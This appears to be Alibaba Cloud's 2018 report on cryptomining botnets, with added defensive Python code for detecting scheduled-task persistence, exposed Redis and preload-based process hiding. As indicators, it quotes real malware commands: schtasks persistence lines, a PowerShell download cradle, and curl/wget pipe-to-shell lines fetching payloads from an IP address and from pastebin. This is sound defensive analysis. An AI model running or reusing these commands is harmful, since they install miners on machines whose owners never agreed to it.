Alibaba Cloud Security: 2018 Cryptocurrency Mining Hijacker Report

Key Takeaways

  • Widely publicized 0-day and N-day vulnerabilities have become the entry point for malicious cryptocurrency miners. To stay ahead of the mining gangs, users must patch such vulnerabilities within a short window of their disclosure.
  • Non-web-based applications exposed to public networks are the favorite targets of malicious cryptocurrency miners.
  • Cryptocurrency mining hijackers rely heavily on brute-force attacks to spread; weak passwords remain the single biggest hole across the Internet.
  • Mining trojans generally spread as worms and maximize their value by persisting on the compromised hosts.
  • Cryptocurrency mining hijackers evade security analysis and attribution through disguised process names, packing (shell protection), code obfuscation, and private mining pools reached through proxies.

Attack Trend Analysis

Popular 0-day and N-day vulnerabilities have become the entry points for miners

Non-web-based applications exposed to public networks are the favorite targets

Cryptocurrency mining hijackers widely exploit brute-force attacks

Malicious Behaviors

Mining Trojans are generally spread as worms

Cryptocurrency mining hijackers maximize their value by persisting on the compromised hosts

cmd /c schtasks /create /sc minute /mo 1 /tn "Miscfost" /ru system /tr "cmd /c C:\Windows\ime\scvsots.exe"
cmd /c schtasks /create /sc minute /mo 1 /tn "Netframework" /ru system /tr "cmd /c echo Y|cacls C:\Windows\scvsots.exe /p everyone:F"
cmd /c echo powershell -nop "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event Filter')))) {IEX(New-Object Net.WebClient).DownloadString('http[:]//stafftest.spdns[.]eu:8000/mate6.ps1')}" >%temp%\y1.bat && SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR "%temp%\y1.bat" &&SCHTASKS /run /TN yastcat
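The three command lines above are exactly what process-creation telemetry (Sysmon event 1, Windows event 4688) records, so they can be hunted for. The Python below is an added example, not code from the Alibaba Cloud report or from any of the malware families it describes: it runs a handful of pattern rules over command lines and combines the weak single signals into a verdict. The three malicious samples are copied from the report (its defanged URL is restored by a refang step); the rules, the verdict thresholds and the benign control line are the author's own assumptions about what is worth alerting on.

```python
"""Hunt for scheduled-task and WMI persistence in process command lines.

Added example; the detection rules below are assumptions about what is
worth alerting on, not a ruleset from the report or any vendor.
"""
import re

# Constructed sample: the three command lines quoted in the report as they
# would appear in process-creation logs, plus one benign control line.
SAMPLE_CMDLINES = [
    r'cmd /c schtasks /create /sc minute /mo 1 /tn "Miscfost" /ru system '
    r'/tr "cmd /c C:\Windows\ime\scvsots.exe"',
    r'cmd /c schtasks /create /sc minute /mo 1 /tn "Netframework" /ru system '
    r'/tr "cmd /c echo Y|cacls C:\Windows\scvsots.exe /p everyone:F"',
    r'''cmd /c echo powershell -nop "$a=([string](Get-WMIObject -Namespace root\Subscription '''
    r'''-Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event Filter')))) '''
    r'''{IEX(New-Object Net.WebClient).DownloadString('http[:]//stafftest.spdns[.]eu:8000/mate6.ps1')}" '''
    r'''>%temp%\y1.bat && SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR "%temp%\y1.bat" '''
    r'''&&SCHTASKS /run /TN yastcat''',
    r'schtasks /create /sc daily /tn "NightlyBackup" /tr "C:\Tools\backup.exe"',
]

# Each rule is a weak signal on its own (admins do create SYSTEM tasks);
# verdict() decides which combinations are strong enough to page someone.
RULES = {
    "task_as_system":         re.compile(r"schtasks\s+/create.*?/ru\s+system", re.I | re.S),
    "task_every_minute":      re.compile(r"/sc\s+minute\s+/mo\s+1\b", re.I),
    "task_runs_from_temp":    re.compile(r'/tr\s+"?%temp%', re.I),
    "acl_everyone_full":      re.compile(r"\bcacls\b.*?/p\s+everyone:F", re.I),
    "wmi_subscription_probe": re.compile(r"__FilterToConsumerBinding", re.I),
    "download_cradle":        re.compile(r"Download(?:String|File)\s*\(", re.I),
    "invoke_expression":      re.compile(r"\bIEX\b|Invoke-Expression", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)


def refang(cmdline):
    """Undo the defanging used in threat reports so the URL rule still fires."""
    return cmdline.replace("hxxp", "http").replace("[:]", ":").replace("[.]", ".")


def scan_cmdline(cmdline):
    """Return (rule names that fired, URLs found) for one command line."""
    text = refang(cmdline)
    hits = [name for name, rx in RULES.items() if rx.search(text)]
    return hits, URL_RE.findall(text)


def verdict(hits):
    """Combine signals: a SYSTEM task that re-runs every minute, a world-writable
    ACL, a WMI subscription check, or a download-and-IEX cradle is high."""
    h = set(hits)
    if ({"task_as_system", "task_every_minute"} <= h
            or "acl_everyone_full" in h
            or "wmi_subscription_probe" in h
            or {"download_cradle", "invoke_expression"} <= h):
        return "high"
    return "medium" if h else "none"


def scan_all(cmdlines):
    """Scan a batch of command lines and attach a verdict to each."""
    out = []
    for c in cmdlines:
        hits, urls = scan_cmdline(c)
        out.append({"cmdline": c, "hits": hits, "urls": urls, "verdict": verdict(hits)})
    return out


if __name__ == "__main__":
    for r in scan_all(SAMPLE_CMDLINES):
        print(r["verdict"].upper(), r["hits"], r["urls"])
```

The URL the cradle pulls from is returned separately because it is the indicator you pivot on next (proxy logs, DNS), while the rule names tell you which persistence mechanism to clean up: the scheduled task, the file ACL, and, for the third line, any `__EventFilter`/`CommandLineEventConsumer` pair the downloaded script may have registered.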

Cryptocurrency mining hijackers disguise themselves to evade security analysis and attribution

Overview of Major Cryptocurrency Miner Hijackers

DDG

  • OrientDB vulnerability (used in its early campaigns)
  • Unauthenticated (unauthorized-access) Redis instances, including ApsaraDB for Redis
  • SSH weak passwords
  • The malware distributes its scripts from multiple IP addresses, 104.236.156.211 among them.
  • The botnet's command-and-control (C2) servers usually listen on port 8000 or 8443.
/bin/sh -c curl -L http://104.236.156.211:8000/i.sh | sh

8220

  • WebLogic XMLDecoder deserialization vulnerability
  • Drupal remote code execution vulnerability
  • JBoss deserialization command execution vulnerability
  • CouchDB vulnerability chain (two vulnerabilities combined for remote command execution)
  • Unauthenticated (unauthorized-access) Redis instances, including ApsaraDB for Redis
  • Unauthenticated access to the Hadoop YARN ResourceManager
  • The attacker exploits vulnerabilities to download, extract, and run multiple malicious programs that have scanning, mining, and other functions.
  • The malware decrypts the miner in the data segment, selects a zombie process, and injects the miner into the zombie process for mining.
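Both DDG and 8220 list unauthenticated Redis among their entry points: an instance reachable from the Internet without `requirepass` lets the attacker run any command, and the usual abuse is `CONFIG SET dir`/`dbfilename` followed by `SAVE` to drop a cron entry or SSH key. The script below is an added example, not part of the report, that performs the same first step as a defensive self-check: it speaks raw RESP over a plain socket and classifies the reply to `PING`. The loopback stand-in server is a constructed test double so the block runs offline; host names and ports are whatever you point it at.

```python
"""Probe whether a Redis instance answers commands without authentication.

Added example (not from the report): the first step the DDG and 8220
campaigns take against an exposed Redis, used here as a self-check.
"""
import socket
import threading


def resp_command(*args):
    """Encode a command as a RESP array, the wire form redis-cli sends."""
    parts = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        data = arg.encode()
        parts.append(f"${len(data)}\r\n".encode() + data + b"\r\n")
    return b"".join(parts)


def classify_reply(reply):
    """Map the first line of the server's reply to an exposure state."""
    line = reply.split(b"\r\n", 1)[0]
    if line.startswith(b"+PONG"):
        return "open"            # no AUTH needed: CONFIG SET, SLAVEOF, FLUSHALL all work
    if line.startswith(b"-NOAUTH"):
        return "auth_required"   # requirepass is set
    if line.startswith(b"-DENIED"):
        return "protected_mode"  # Redis >= 3.2 refusing non-loopback clients without a password
    return "unknown"


def check_redis(host, port=6379, timeout=3.0):
    """Connect, send PING, classify the reply. Raises on connection errors."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(resp_command("PING"))
        return classify_reply(s.recv(512))


def fake_redis(reply):
    """Constructed loopback stand-in: answers one client with a canned reply.
    Returns the ephemeral port it listens on."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            conn.recv(512)
            conn.sendall(reply)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    for canned in (b"+PONG\r\n", b"-NOAUTH Authentication required.\r\n"):
        port = fake_redis(canned)
        print(port, check_redis("127.0.0.1", port))
```

Run `check_redis` from outside the host's network, not from localhost: protected mode only refuses non-loopback clients, so a loopback probe can report "open" on an instance that is in fact unreachable. The fix for an "open" result is the same in every case: `bind` to internal addresses, set `requirepass`, leave `protected-mode yes`, and keep port 6379 off the public security group.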

Mykings (a.k.a. the Hidden)

  • 3306 MySQL
  • 135 WMI
  • 22 SSH
  • 445 IPC
  • 23 Telnet
  • 80 Web
  • 3389 RDP
  • The attacker exploits vulnerabilities to download, extract, and run multiple malicious programs that have scanning, mining, and other functions.
  • Mykings ships with a bootkit: after the trojan is implanted, it overwrites the MBR so that the infection is loaded before the operating system and survives ordinary cleanup.

Bulehero

RDPMiner

  • The attacker exploits vulnerabilities to download, extract, and run multiple malicious programs that have scanning, mining, and other functions.
  • The malware disables the Windows firewall and adds startup items.
  • The malware adds malicious user accounts.

JbossMiner

  • JBoss deserialization vulnerability (primary)
  • Struts2 remote command execution vulnerability
  • EternalBlue vulnerability

WannaMine

  • EternalBlue vulnerability
  • Weak RDP passwords, or the same password reused across multiple hosts
  • The attacker exploits vulnerabilities to download, extract, and run multiple malicious programs that have scanning, mining, and other functions.
  • The malware dumps user passwords from memory.

Kworkerd

  • The attacker exploits vulnerabilities to download, extract, and run multiple malicious programs that have scanning, mining, and other functions.
  • The malware replaces /etc/ld.so.preload so that its library is loaded into every dynamically linked process and hijacks the libc functions used to enumerate processes; as a result top, ps, and similar commands cannot see the mining process.
  • The botnet uses Pastebin as the file distribution platform.
(curl -fsSL https://pastebin.com/raw/uuYVPLXd||wget -q -O- https://pastebin.com/raw/uuYVPLXd)|base64 -d|/bin/bash
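A preload library that filters `readdir()` hides PIDs from every tool that walks the /proc directory, but the kernel still answers `stat()` on `/proc/<pid>` for the hidden process, so enumerating PIDs by probing each number gives an independent view. The audit below is an added example, not from the report or the Kworkerd analysis it cites: it reports any ld.so.preload entries and any PIDs present in the probed view but missing from `ps`. The constructed sample models a hooked host hiding PID 4242; the library path in it is invented for illustration.

```python
"""Audit a Linux host for ld.so.preload process hiding of the Kworkerd kind.

Added example, not from the report. Two checks: /etc/ld.so.preload should be
absent or empty, and the set of PIDs found by probing /proc/<n> should match
what ps reports. Anything in the first but not the second is a hidden process.
"""
import os


def preload_entries(content):
    """Library paths listed in an ld.so.preload file (comments and blanks dropped)."""
    return [ln.strip() for ln in content.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")]


def pids_from_listing(entries):
    """PIDs from a directory listing of /proc (what readdir-based tools see)."""
    return {int(e) for e in entries if e.isdigit()}


def pids_from_ps(ps_output):
    """PIDs from `ps -e -o pid=` style output, one PID per line."""
    return {int(tok) for tok in ps_output.split() if tok.isdigit()}


def probe_pids(pid_max, exists=os.path.exists):
    """Enumerate PIDs by probing /proc/<n> for every n up to pid_max rather than
    reading the directory. `exists` is injectable so the logic runs offline."""
    return {n for n in range(1, pid_max + 1) if exists(f"/proc/{n}")}


def hidden_pids(independent_view, tool_view):
    """PIDs the independent view knows about that the tool failed to report."""
    return sorted(independent_view - tool_view)


def audit(listing, ps_output, preload_content, probed):
    """Combine the checks into one result dict."""
    shown = pids_from_ps(ps_output)
    hidden = hidden_pids(pids_from_listing(listing) | probed, shown)
    preload = preload_entries(preload_content)
    return {"preload": preload, "hidden": hidden, "suspicious": bool(preload or hidden)}


def audit_live():
    """Run the audit on the current host (Linux only). Takes a few seconds
    because it probes every PID up to pid_max."""
    try:
        with open("/etc/ld.so.preload") as f:
            preload = f.read()
    except FileNotFoundError:
        preload = ""
    with open("/proc/sys/kernel/pid_max") as f:
        pid_max = int(f.read())
    ps_out = os.popen("ps -e -o pid=").read()
    return audit(os.listdir("/proc"), ps_out, preload, probe_pids(pid_max))


# Constructed sample of a hooked host: the listing and ps both omit PID 4242
# because readdir() is filtered, but stat() on /proc/4242 still succeeds.
SAMPLE_LISTING = ["1", "2", "345", "self", "sys", "cpuinfo"]
SAMPLE_PS = "  PID\n    1\n    2\n  345\n"
SAMPLE_PRELOAD = "# constructed\n/usr/local/lib/libhide.so\n"   # hypothetical path
SAMPLE_PROBED = {1, 2, 345, 4242}

if __name__ == "__main__":
    print(audit(SAMPLE_LISTING, SAMPLE_PS, SAMPLE_PRELOAD, SAMPLE_PROBED))
```

The caveat: ld.so.preload applies to the Python interpreter too, so a library that also hooks `stat()`/`open()` can lie to the probe. When the result matters, repeat the probe from a statically linked binary (busybox) or from a rescue environment, and once a PID is confirmed hidden, read its `/proc/<pid>/exe` and `cmdline` before killing it so the mining pool address can be blocked.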

DockerKiller

  • The attacker exploits vulnerabilities to download, extract, and run multiple malicious programs that have scanning, mining, and other functions.
  • The malware disables Windows firewalls.
  • The malware adds startup items.
  • The malware adds malicious user accounts.

Security Recommendations

  • The weakest link in any security system is the user, and the most serious incidents often trace back to negligence: weak passwords and brute-force cracking alone account for 50% of mining activity. Security awareness training is essential for enterprises and individuals alike.
  • The window between disclosure and exploitation of a 0-day keeps shrinking, so enterprises need faster emergency vulnerability response: keep application systems up to date, watch vendor security announcements and apply the corresponding upgrades promptly, or purchase fully managed security services to raise the security baseline.
  • As elastic cloud computing spreads, so does the exposure of non-web network applications (Redis, MySQL, Hadoop YARN, Docker, RDP and SSH are the ones seen in the campaigns above). Security O&M staff should inventory and restrict these services; where that is not feasible, a firewall with IPS capability can block exploitation of newly disclosed vulnerabilities until a patch is deployed.

References

  1. Mykings’ Latest Mining Activities Are Exposed, https://x.threatbook.cn/nodev4/vb4/article?threatInfoID=936
  2. Mykings: The Most Active Network Hacker Gang, https://www.huorong.cn/info/150097083373.html
  3. DDG Targets Database Servers, Earning Revenues of Nearly RMB 8 Million, http://www.4hou.com/technology/11770.html
  4. Bulehero Again Exploits EternalBlue to Spread in Enterprise Internal Networks, https://www.freebuf.com/column/180544.html
  5. JbossMiner Mining Analysis, https://xz.aliyun.com/t/2189
  6. Kworkerd Mining Analysis, https://www.anquanke.com/post/id/159497
  7. Threat Hunting, the Investigation of Fileless Malware Attacks, https://www.pandasecurity.com/mediacenter/pandalabs/threat-hunting-fileless-attacks/
  8. Cryptomining: Harmless Nuisance or Disruptive Threat?, https://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/
  9. Traceability Analysis on Suspected “8220” in China, https://ti.360.net/blog/articles/8220-mining-gang-in-china/
  10. http://ju.outofmemory.cn/entry/354000
